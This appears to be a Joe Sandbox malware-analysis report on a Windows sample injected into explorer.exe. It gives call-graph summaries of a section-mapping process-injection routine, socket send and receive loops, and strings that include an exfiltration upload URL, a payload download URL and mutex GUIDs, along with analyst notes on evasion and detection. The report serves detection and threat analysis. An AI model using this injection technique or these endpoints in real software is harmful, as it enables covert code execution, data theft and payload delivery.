                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: ab94a09881a885e5e33cd19bfb2134984321c6d08c569d29b30434245b6991e7
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: ab94a09881a885e5e33cd19bfb2134984321c6d08c569d29b30434245b6991e7
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50

                                                                            Execution Graph

                                                                            Execution Coverage:11.4%
                                                                            Dynamic/Decrypted Code Coverage:99.8%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:513
                                                                            Total number of Limit Nodes:41
                                                                            execution_graph 17208 c0c4d0 17209 c0c4d5 RtlFreeHeap 17208->17209 17213 c0c505 free 17208->17213 17210 c0c4f0 17209->17210 17209->17213 17214 c0a940 17210->17214 17217 c0abe4 GetLastError FlsGetValue 17214->17217 17216 c0a949 GetLastError 17216->17213 17218 c0ac52 SetLastError 17217->17218 17219 c0ac0a 17217->17219 17218->17216 17229 c1061c 17219->17229 17221 c0ac17 17221->17218 17222 c0ac1f FlsSetValue 17221->17222 17223 c0ac35 17222->17223 17224 c0ac4b 17222->17224 17234 c0ab2c 17223->17234 17243 c0c4d0 17224->17243 17228 c0ac50 17228->17218 17231 c10641 17229->17231 17232 c10681 17231->17232 17233 c1065f Sleep 17231->17233 17249 c12cbc 17231->17249 17232->17221 17233->17231 17233->17232 17259 c10b64 17234->17259 17244 c0c4d5 RtlFreeHeap 17243->17244 17248 c0c505 free 17243->17248 17245 c0c4f0 17244->17245 17244->17248 17246 c0a940 _errno 60 API calls 17245->17246 17247 c0c4f5 GetLastError 17246->17247 17247->17248 17248->17228 17250 c12cd1 17249->17250 17255 c12cee 17249->17255 17251 c12cdf 17250->17251 17250->17255 17253 c0a940 _errno 61 API calls 17251->17253 17252 c12d06 HeapAlloc 17254 c12ce4 17252->17254 17252->17255 17253->17254 17254->17231 17255->17252 17255->17254 17257 c0c738 DecodePointer 17255->17257 17258 c0c753 17257->17258 17258->17255 17260 c10b93 EnterCriticalSection 17259->17260 17261 c10b82 17259->17261 17265 c10a7c 17261->17265 17266 c10aa3 17265->17266 17267 c10aba 17265->17267 17297 c0eaec 17266->17297 17279 c10acf 17267->17279 17346 c1059c 17267->17346 17274 c10ae5 17277 c0a940 _errno 60 API calls 17274->17277 17275 c10af4 17278 c10b64 _lock 60 API calls 17275->17278 17277->17279 17280 c10afe 17278->17280 17279->17260 17290 c0e838 17279->17290 17281 c10b37 17280->17281 17282 c10b0a InitializeCriticalSectionAndSpinCount 17280->17282 17285 c0c4d0 free 60 API calls 17281->17285 17283 c10b26 LeaveCriticalSection 17282->17283 17284 c10b19 17282->17284 17283->17279 
17286 c0c4d0 free 60 API calls 17284->17286 17285->17283 17288 c10b21 17286->17288 17289 c0a940 _errno 60 API calls 17288->17289 17289->17283 17291 c0eaec _FF_MSGBANNER 62 API calls 17290->17291 17292 c0e845 17291->17292 17293 c0e88c _FF_MSGBANNER 62 API calls 17292->17293 17294 c0e84c 17293->17294 17448 c0e670 17294->17448 17351 c12598 17297->17351 17300 c0e88c _FF_MSGBANNER 62 API calls 17302 c0eb20 17300->17302 17301 c12598 _set_error_mode 62 API calls 17303 c0eb09 17301->17303 17304 c0e88c _FF_MSGBANNER 62 API calls 17302->17304 17303->17300 17305 c0eb2a 17303->17305 17304->17305 17306 c0e88c 17305->17306 17307 c0e8c0 _FF_MSGBANNER 17306->17307 17308 c0ea12 17307->17308 17309 c12598 _set_error_mode 59 API calls 17307->17309 17415 c0c4b0 17308->17415 17311 c0e8d6 17309->17311 17313 c0ea54 GetStdHandle 17311->17313 17314 c12598 _set_error_mode 59 API calls 17311->17314 17312 c0eacc 17343 c0e4dc 17312->17343 17313->17308 17316 c0ea67 _snprintf 17313->17316 17315 c0e8e7 17314->17315 17315->17308 17315->17313 17370 c1252c 17315->17370 17316->17308 17318 c0eaa1 WriteFile 17316->17318 17318->17308 17320 c0ea40 17323 c0a834 _fltout2 16 API calls 17320->17323 17321 c0e92d GetModuleFileNameW 17322 c0e953 17321->17322 17328 c0e97c _FF_MSGBANNER 17321->17328 17324 c1252c _FF_MSGBANNER 59 API calls 17322->17324 17325 c0ea53 17323->17325 17326 c0e964 17324->17326 17325->17313 17326->17328 17329 c0a834 _fltout2 16 API calls 17326->17329 17327 c0e9d4 17388 c123d4 17327->17388 17328->17327 17379 c1245c 17328->17379 17329->17328 17333 c123d4 _FF_MSGBANNER 59 API calls 17336 c0e9f9 17333->17336 17335 c0a834 _fltout2 16 API calls 17335->17320 17337 c0ea17 17336->17337 17338 c0e9fd 17336->17338 17341 c0a834 _fltout2 16 API calls 17337->17341 17397 c121cc 17338->17397 17339 c0a834 _fltout2 16 API calls 17339->17327 17342 c0ea2b 17341->17342 17342->17335 17428 c0e4a0 GetModuleHandleW 17343->17428 17347 c105c4 17346->17347 17349 c105fc 17347->17349 17350 c105d8 Sleep 17347->17350 
[Residue of the report's rendered overview call graph (node ids, addresses and "a->b" edges). Only the function entry points and the API names carried in the node labels are recoverable; they are summarised here in the order they appear.]

• c09784: GetStartupInfoW, HeapCreate (c0f5ac), GetVersion, HeapSetInformation (c0f5d4/c0f5de), then c0adc0 → c0e50c → c0aaf8 EncodePointer; error paths through _FF_MSGBANNER (c0eaec, c0e88c) and c0e4dc malloc. C run-time start-up.
• c10da4 (reached from c0c4b9): RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, c10950, SetUnhandledExceptionFilter, UnhandledExceptionFilter, _cftoe_l, GetCurrentProcess, TerminateProcess. C run-time fatal-error handler.
• Other C run-time helpers seen: c0a940 _errno (61/62 API calls), c0a8d8 _invalid_parameter_noinfo (17 API calls), c0a868 / c0e6c5 / c0e727 / c0e73d DecodePointer, c0aaf8 EncodePointer, c0a834 → c0a6e8 _fltout2 → c0a84c GetCurrentProcess TerminateProcess, c0c690 / c0c6c8 HeapAlloc with c0c738 _callnewh DecodePointer (malloc path), c0e4dc malloc (3 API calls), c0e4ba GetProcAddress → c0e4cf ExitProcess, c10b64 _lock (56 API calls), c0e786 _initterm, c10a64 LeaveCriticalSection.
• bf908b, bf8ce3 and bf957b: long chains of LoadLibraryW / LoadLibraryExW each followed by GetProcAddress (and GetProcAddressForCaller), every lookup with its own failure branch. Imports are resolved at run time rather than through the import table.
• c02286: calls bfddc0 (3 API calls), bef510 (96), c08378 (89), be7ef0 (120), bef200 (106), beee80 (127), bfc130 (10), bf6790 (110), then WSAStartup, CreateEventW, CreateThread ×3 (one thread runs c05d20, 277 API calls, labelled Concurrency::details::platform::__ChangeTimerQueueTimer), CloseHandle, WSACleanup, LocalFree.
• c034e0 → c03510 → c033b0 send (via c04620, 5 API calls) and c033f0 → c03420 → c03370 recv (via c04500, 5 API calls): socket send / receive wrappers.
• be4af4: loop over WaitForSingleObject and LocalFree that calls be4da0 (104 API calls), be4710 (93), be4670 (90) and bf9cb0 (85).
• bf7af0 and bfc360: window procedures dispatching to befba0 (114 API calls), bef200 (106) and bef370 (6), with DefWindowProcW as the default case.
• c16a00 → bf33a0 VariantClear.

                                                                            Control-flow Graph

                                                                            control_flow_graph (function bf0740; the rendered graph's node labels, summarised in block order)
                                                                            • bf0740-bf079c: call c01f90. bf07b6-bf0823: CreateProcessW; failure goes straight to bf1299 (return).
                                                                            • bf0829-bf08e6: GetModuleHandleW, GetProcAddress ×5, GetCurrentProcess. bf08ec-bf0922: four consecutive checks; any failure reaches bf125d → bf1264-bf1290 TerminateProcess, CloseHandle ×2 (the created process is killed).
                                                                            • bf0928-bf09cc: NtCreateSection. bf09d2-bf0a52: GetCurrentProcess, NtMapViewOfSection (current process). bf0a58-bf0ac8: NtMapViewOfSection (second mapping of the same section, into the process created above).
                                                                            • bf0ace-bf0b47: NtCreateSection. bf0b4d-bf0bd0: GetCurrentProcess, NtMapViewOfSection. bf0bd6-bf0c46: NtMapViewOfSection.
                                                                            • bf0c4c-bf0e8b: call c08b30, LoadLibraryW, GetProcAddress ×2, lstrcpyW ×2, lstrcpyA ×9, NtCreateSection. bf0e91-bf0f14: GetCurrentProcess, NtMapViewOfSection. bf0f1a-bf0f8a: NtMapViewOfSection.
                                                                            • bf0f90-bf1010: call c08b30, CreateEventW. bf1016-bf1086: RtlCreateUserThread. bf108c-bf10e1: WaitForSingleObject; if signalled, bf10e7-bf119f NtUnmapViewOfSection ×6, NtClose ×3, CloseHandle and return; otherwise bf11a6-bf11db TerminateProcess, CloseHandle ×2.
                                                                            • Unwind chain on any earlier failure (bf11e3 → bf11f1 → bf1207 → bf1215 → bf122b → bf1239 → bf124f → bf125d): CloseHandle, then NtUnmapViewOfSection / NtClose for each section in reverse order, ending in TerminateProcess, CloseHandle ×2.
                                                                            Reading: no WriteProcessMemory or VirtualAllocEx appears anywhere in this function. Three sections are created and each is mapped twice, once into the current process and once into the freshly created one, and execution in the target starts with RtlCreateUserThread rather than CreateRemoteThread. The API names listed under String ID below (LoadLibraryA/W, GetProcAddress, VirtualAlloc, VirtualProtect, NtMapViewOfSection, ...) are what the lstrcpyA calls in bf0c4c-bf0e8b copy, which is consistent with a bootstrap table handed to the injected code. A detection keyed only on WriteProcessMemory + CreateRemoteThread will not fire on this path; NtMapViewOfSection with a foreign process handle followed by RtlCreateUserThread is the pair to alert on.
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            • API ID: Section$View$Close$lstrcpy$Unmap$AddressHandleProcProcess$Create$Current$Terminate$EventLibraryLoadModuleObjectSingleThreadUserWait
                                                                            • String ID: @$@$CloseHandle$GetProcAddress$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryA$LoadLibraryW$LocalAlloc$LocalFree$MessageBoxW$NTDLL.DLL$NtClose$NtCreateSection$NtMapViewOfSection$NtUnmapViewOfSection$RtlCreateUserThread$Sleep$USER32.DLL$VirtualAlloc$VirtualFree$VirtualProtect$h
                                                                            • API String ID: 1065732154-2887914861
                                                                            • Opcode ID: bc1450d54a7e3ae3bddbcd0ebfc7df54fa7a22a4b3b051502df39f47e0664263
                                                                            • Instruction ID: 2dda2f112b3d71f83cd715188c62f2121c3eb8e0877f978f4dbf10079d76b499
                                                                            • Opcode Fuzzy Hash: bc1450d54a7e3ae3bddbcd0ebfc7df54fa7a22a4b3b051502df39f47e0664263
                                                                            • Instruction Fuzzy Hash: 0152A076208BC486EB71DF15F8A87DAB7A0F789794F501216DA8943B68DF7DC188CB40

                                                                            Control-flow Graph

                                                                            control_flow_graph (function c05d20; the rendered graph's node labels, summarised in block order)
                                                                            • c05d20-c05d4b: OpenEventW (string {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA} at 00C05D2C); failure → c0635e-c06367, return.
                                                                            • c05d63-c05d77: OpenMutexW ({C3397568-8840-4085-8F6E-BC07C085BB3B} at 00C05D63). c05da7-c05dc6: OpenMutexW ({50EF1399-6492-458E-896D-12BB129EB697} at 00C05DA7), then c05dcc-c05de2 WaitForSingleObject on it; failure → c06340 teardown.
                                                                            • c05df2-c05e14: CreateEventW, then a polling loop (c05e1a-c05f4d) of WaitForSingleObject / SleepEx with c05f6e-c05f7e call c06f30 and c06305 call c06dd0.
                                                                            • c05f84-c05fb1: setsockopt. c05fb7-c05fd5: CreateEventW. c05fdb-c05ffc: LocalAlloc. c06002-c06047: CreateThread.
                                                                            • c0604d-c0616e: receive loop: GetTickCount, WaitForSingleObject, call c03370 (the recv wrapper), WSAGetLastError, GetTickCount, SleepEx; a second call c03370 at c06142-c0615f. On error c06173-c061be shutdown, closesocket, SetEvent, WaitForSingleObject, call c06dd0, then c061c3-c061d3 call bf3ae0, CloseHandle, and c061e7-c061ef LocalFree.
                                                                            • c06209-c06255: shutdown, closesocket, CloseHandle, call c01f90. c06287-c06299: WaitForSingleObject, then back to c05e89 (outer loop). c0627b-c0627d: ExitProcess. c0629e-c062fc: WaitForSingleObject, SetEvent, CloseHandle ×2. c0632a-c0633a: ReleaseMutex, CloseHandle. c06340-c06358: CloseHandle (either of two handles), return.
                                                                            Reading: the three GUIDs below are the names of the event and mutex objects opened at c05d2c, c05d63 and c05da7; {C3397568-8840-4085-8F6E-BC07C085BB3B} is also referenced from be53b0 (00BE5409). Named objects of this form survive reboots only as long as the process runs, so they are cheap live-host indicators but not on-disk ones.
                                                                            Strings
                                                                            • {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}, xrefs: 00C05D2C
                                                                            • {50EF1399-6492-458E-896D-12BB129EB697}, xrefs: 00C05DA7
                                                                            • {C3397568-8840-4085-8F6E-BC07C085BB3B}, xrefs: 00C05D63
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true (associated dumps as listed for bf0740 above)
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            • API ID: CloseHandle$EventMutexOpen$CreateObjectReleaseSingleWait
                                                                            • String ID: {50EF1399-6492-458E-896D-12BB129EB697}${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${C3397568-8840-4085-8F6E-BC07C085BB3B}
                                                                            • API String ID: 385723476-3953213537
                                                                            • Opcode ID: 0171fc8fe2a2caf8a8dd4e850ab5321596dcbdb07deaa844fe753b2e4925b558
                                                                            • Instruction ID: e223973b5d7306524d08164424b5dfd795eb3e62cfa1f4fd750288f3d6c225da
                                                                            • Opcode Fuzzy Hash: 0171fc8fe2a2caf8a8dd4e850ab5321596dcbdb07deaa844fe753b2e4925b558
                                                                            • Instruction Fuzzy Hash: EFF14D31518A40C6F760DF65F86876EB3A1F7C4754F205226E69A82AF8CF7CC999DB00

                                                                            Control-flow Graph

                                                                            control_flow_graph (function be53b0; the rendered graph's node labels, summarised in block order)
                                                                            • be53b0-be53dc: LocalAlloc; failure → be5a06 cleanup.
                                                                            • be53e8-be5593: lstrcpyW ×7 (this block references {75DBD054-...}, {C3397568-...}, {F8334C8B-...}, the Firefox/64.0 User-Agent, https://woo097878781.win/upload.php and {77F3A004-...}), call bf2160.
                                                                            • be5599-be5616: CryptBinaryToStringW ×2. be5618-be5686: call c08378, lstrcpyW (HWID_%s at 00BE564F).
                                                                            • be569f-be56ad: call be52c0. be56b9-be56c6: LocalFree.
                                                                            • be56dc-be5766: call bf9cb0 (this block references the User-Agent again and https://woo097878781.win/64.EXE). be5773-be5797: WaitForSingleObject; be57a3 loops back to be56d1, so the bf9cb0 call is retried.
                                                                            • be57a8-be57c8: RtlExitUserThread branch. be57ce-be5839: call c091b0, call bf2230.
                                                                            • be5845-be58d2: call c08378, call bf0740 (the section-mapping injection routine above; this block references {D4D7F2EA-...}, "%s %s" and {F8334C8B-...}).
                                                                            • be58de-be5931: WaitForMultipleObjects, WaitForSingleObject. be593d-be5952: GetExitCodeProcess. be597b-be59d7: WaitForSingleObject, then back to be57ce.
                                                                            • be59e3-be5a64: CloseHandle ×2, LocalFree ×2, CloseHandle ×2 (cleanup, return).
                                                                            Strings
                                                                            • HWID_%s, xrefs: 00BE564F
                                                                            • {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}, xrefs: 00BE5863
                                                                            • https://woo097878781.win/upload.php, xrefs: 00BE547D
                                                                            • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0, xrefs: 00BE5443, 00BE56FE
                                                                            • %s %s, xrefs: 00BE5877
                                                                            • {75DBD054-29DD-4A93-8CEC-1ACB8CD829DA}, xrefs: 00BE53E8
                                                                            • https://woo097878781.win/64.EXE, xrefs: 00BE5723
                                                                            • {77F3A004-6E1A-45B6-91BA-6F11612691D9}, xrefs: 00BE549A
                                                                            • {F8334C8B-EA9E-45F9-ADFE-BAE309D22900}, xrefs: 00BE5426, 00BE5890
                                                                            • {C3397568-8840-4085-8F6E-BC07C085BB3B}, xrefs: 00BE5409
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true (associated dumps as listed for bf0740 above)
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            • API ID: lstrcpy$Local$BinaryCloseCryptFreeHandleString$Alloc
                                                                            • String ID: %s %s$HWID_%s$Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0$https://woo097878781.win/64.EXE$https://woo097878781.win/upload.php${75DBD054-29DD-4A93-8CEC-1ACB8CD829DA}${77F3A004-6E1A-45B6-91BA-6F11612691D9}${C3397568-8840-4085-8F6E-BC07C085BB3B}${D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}${F8334C8B-EA9E-45F9-ADFE-BAE309D22900}
                                                                            • API String ID: 1616647813-368922710
                                                                            • Opcode ID: fb057543f897bf854077adb860b26d5b8eb43cbc544869e0975fe74bd2c6d831
                                                                            • Instruction ID: 3f4b37b8bc45e8888c82363ebdc1406a6603c1cc99a49db22464e162d236acb6
                                                                            • Opcode Fuzzy Hash: fb057543f897bf854077adb860b26d5b8eb43cbc544869e0975fe74bd2c6d831
                                                                            • Instruction Fuzzy Hash: DB024835204B84C6FB60DF15F8A8B9A73A1F788B58F905226DA4E837A5DF7CC558CB01

                                                                            Control-flow Graph (graph rendering omitted; legend: Executed / Not Executed)
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateErrorLastPath$DirectoryFileFolderFreeKnownTaskTemplstrcpy
                                                                            • String ID: "%s"$"%s" "%s"$%s\%s$%s\%s$Open$h
                                                                            • API String ID: 1929679530-3531242659
                                                                            • Opcode ID: 0f1c72e8aa291dc0e6dd980f3150c005a203dd71a7ce534f4f7e3533c3246e6d
                                                                            • Instruction ID: ff212a963c6d451a1198104cae8451038f59675eddb5e5904e57cf28b6525b0b
                                                                            • Opcode Fuzzy Hash: 0f1c72e8aa291dc0e6dd980f3150c005a203dd71a7ce534f4f7e3533c3246e6d
                                                                            • Instruction Fuzzy Hash: A7B12872218BC496EB70DB65E4947DBB3A1F788754F804626D68D83BA8EF3CC518CB40

                                                                            Control-flow Graph (graph rendering omitted; legend: Executed / Not Executed)
                                                                            APIs
                                                                            • std::rethrow_exception.LIBCMTD ref: 00BF9D70
                                                                            • std::rethrow_exception.LIBCMTD ref: 00BF9DF4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: std::rethrow_exception
                                                                            • String ID: */*$GET$h
                                                                            • API String ID: 1317400359-3109941101
                                                                            • Opcode ID: 53e49ed18156fcc6834767a953aadd6bc91d445507a3527b6585ba5e2276e322
                                                                            • Instruction ID: c1998c8449fb4ee9b757a3a0521ccfe02c1285d09cbdc36f57ec97d83f3c619b
                                                                            • Opcode Fuzzy Hash: 53e49ed18156fcc6834767a953aadd6bc91d445507a3527b6585ba5e2276e322
                                                                            • Instruction Fuzzy Hash: B802D272218AC886E774DB55E4947EEB7A0F389784F504126DB8D83BA8DF7DC588CB01

                                                                            Control-flow Graph (graph rendering omitted; legend: Executed / Not Executed)
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$Thread$EventFreeLocal$CleanupCloseHandleStartuplstrlen
                                                                            • String ID: "%s%s"$UNLOAD.TXT$WindowsServer2024$WindowsServer2024$WindowsServer2024.exe${741330C7-73F4-49B6-9258-6679317DED46}
                                                                            • API String ID: 168511978-710896368
                                                                            • Opcode ID: 67abe8c88c688752f347c4032eb8ca2881074141af63408430bdc0ac8b336b55
                                                                            • Instruction ID: 873dd701552433b739b463e8eef14f75e00fbb32d976f3e66d540913394d8989
                                                                            • Opcode Fuzzy Hash: 67abe8c88c688752f347c4032eb8ca2881074141af63408430bdc0ac8b336b55
                                                                            • Instruction Fuzzy Hash: E4613D32114B8582F774EF60F968BAA33A5F798358F409226D95947AB4DF7DC68CCB00

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00BF87C0: LoadLibraryW.KERNEL32 ref: 00BF87D2
                                                                            • ExitProcess.KERNEL32 ref: 00BE104B
                                                                            • GetModuleFileNameW.KERNEL32 ref: 00BE1076
                                                                            • ExitProcess.KERNEL32 ref: 00BE1082
                                                                            Strings
                                                                            • {650443EC-0EFE-4819-82E8-5F93F6D2E6A5}, xrefs: 00BE10AF
                                                                            • {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}, xrefs: 00BE10FB
                                                                            • {36B5A614-B027-4841-8B7A-585CE588BF9D}, xrefs: 00BE1134
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess$FileLibraryLoadModuleName
                                                                            • String ID: {36B5A614-B027-4841-8B7A-585CE588BF9D}${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${650443EC-0EFE-4819-82E8-5F93F6D2E6A5}
                                                                            • API String ID: 2450766465-2053532797
                                                                            • Opcode ID: 482fb3a350b31bacb31896883e192aa97b6bd53c2f9ebca60f0dcddbc31280cb
                                                                            • Instruction ID: f8648e9643fbc8f9537497963af8b521ebb8752d028cc7536eba7c65d42f4d12
                                                                            • Opcode Fuzzy Hash: 482fb3a350b31bacb31896883e192aa97b6bd53c2f9ebca60f0dcddbc31280cb
                                                                            • Instruction Fuzzy Hash: 3E415E71124AC082F724EB25F869BAE73E1FB59780FA04629D68A82664DF7DC58CC740
                                                                            APIs
                                                                              • Part of subcall function 00BF7DA0: lstrlenW.KERNEL32 ref: 00BF7DEC
                                                                            • CoInitializeEx.COMBASE ref: 00BE7FFA
                                                                            • CoInitializeSecurity.COMBASE ref: 00BE804F
                                                                            • CoUninitialize.COMBASE ref: 00BE8E02
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
